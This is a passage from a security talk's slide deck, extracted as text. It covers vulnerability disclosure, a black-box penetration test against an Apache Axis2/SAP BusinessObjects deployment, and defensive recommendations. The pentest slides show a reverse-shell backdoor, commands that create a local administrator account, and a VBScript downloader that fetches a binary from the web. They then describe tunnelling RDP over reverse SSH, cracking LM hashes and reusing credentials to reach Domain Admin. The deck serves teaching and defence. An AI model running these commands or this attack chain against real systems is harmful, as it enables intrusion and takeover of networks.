into account that a patch is available
Responsible disclosure principle
Vendors are notified first
Vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground Websites on TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR)
ccc.de (ALL), blackhat.com (US)
46. Vulnerabilities and Exploitation
Complexity of systems, applicative codes, communication flows, network
segmentation
Out-of-the-box vulnerabilities of Vendor solutions, lack of security
configuration
Next->Next->Next Syndrome
Lack of secure coding awareness
TOP 10 OWASP
Lack of enforcement for Security during IT Projects
Security implies Cost and Time
Need for functionality <-> Need for security
BlackList Mode
Learning Mode
48. Penetration test example
• Context: Black Box Intrusion test. Scope: External-facing
systems
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’EntrepriseInternal Network
49. Penetration test example
• VULN 1/2: Vulnerable deployment of SAP BO ( Apache
Axis2 )
• CVE-2010-0219 , Apache Axis2 Default Credentials
• http://www.securityfocus.com/bid/40343 , Apache Axis2
Directory traversal
• See earlier:
• Vuln « Directory Traversal »
• Vuln « Default Password »
• Allows to have admin credentials to Axis2
51. Penetration test example
• Access to Axis2 administration allows to upload a Web
Service and hot deployment of it
52. Penetration test example
• A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects
Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse shell backdoor on the server to connect back to
port 80
• VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
C&C SERVER – PORT 80
Port 80
Internal Network
53. Penetration test example
• Not possible to upload a meterpreter (killed by AV on the machine)
• Possible to upload a backdoor which sends me back a DOS
command prompt on the server
54. Penetration test example
• Next steps:
• Create privileged account on the server
• VULN 4: Application server is running under ADMIN privileges
• Net user temptest password /add
• Net localgroup Administrators hacked /add
• Obtain a Remote Desktop connection
• Problem: Port 3389 closed Inbound
• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443
55. Penetration test example
• To create the tunnel, I need to download a SSH Client on
the Server using DOS command prompt
• I create a VBSCRIPT script using « Echo » command, then
execute the VBSCRIPT
• Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• Cscript dl.vbs
• Use plink to create the tunnel
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "c:tempplink.exe", 2 '//overwrite
end with
56. Penetration test example
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443
Connect to RDP through the tunnel and use the user account I just
created to connect
temptest
password
57. Penetration test example
Next Step -> Lateral Movement – the simplest first, credentials
reuse
I need to crack all passwords present locally on the infected server
Vuln 6/7: Windows 2003 Design Vulnerabilities
VULN 6: « Repair » file contains a SAM backup file containing encrypted
credentials using LMHASH
VULN: LMHASH encryption algorithm is broken and can be cracked
easily
59. Penetration test example
VULN 8: Local Administrator password is replicated over all systems
in the DMZ
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443 Web Servers
Web Servers
Web Servers
Port 3389
60. Penetration test example
Next-Step: Try to hit Internal Network
VULN 9 : DMZ Systems members of Internal Windows Domain. Means that
critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal
network
VULN 10 : Password Replication Bis – A Domain Admin user account whose
name is identical has a local account has the same password
61. Penetration test example
I connect to the Domain Controller from the DMZ using the Domain
Admin account. I am now Domain Administrator and has full control
over the Enterprise Domain
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
Contrôleur de Domaine
Domain Controller
63. Conclusion
Cyber Crime will continue to be a major threat for enterprises for the next
years
Computer Vulnerabilities will continue to be discovered and will continue
to affect enterprises
Legacy technologies such as standard AV are no longer sufficient to protect
against cyber threats
Operational IT Security programs must address security incident response
and must address each of the following:
Awareness
Preventive security
Detective security
Corrective security
64. Conclusion
[Personal Statement] Be careful with the notion of Risk-Based Security,
based on asset classification
Should less critical systems be given less attention in terms of security?
If a Hacker can compromise a system in non critical zone and obtain credentials that are re-used in
other zones? If the enterprise does not have one Windows Domain per Risk Domain?
Use Risk-Based security only if you have a full IT isolation… even thou is that enough?
Awareness
Educate all your employees to emergent cyber threats
Make real social-engineering exercises, with sending undetected Viruses to your employees
Be careful to human reaction
Educate but also protect colleagues who will be infected during the exercise
65. Conclusion
Preventive Security
Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against
APTs
Implement NAC
Identify your vulnerabilities before the hackers
Network security must be governed: network segmentation policies, firewall rules governance, flow and
application control, inbound and outbound traffic policies..
High Privileges Management
Isolation of network tiers
Use hardening best practices
E.g. Remove admin rights from end users and from applications (least privilege)
Implement correct Windows security settings
66. Conclusion
Detective security
Real-time correlation of technical use cases has a real added-value
Monitor for accounts creation on any system
Monitor any “Domain Admin” privilege elevation
Monitor for internal scans
Monitor authentication failures
Monitor denied outbound traffic
Corrective Security
Have emergency security procedures for containment defined and tested
Have a security incident response plan
Have a patching policy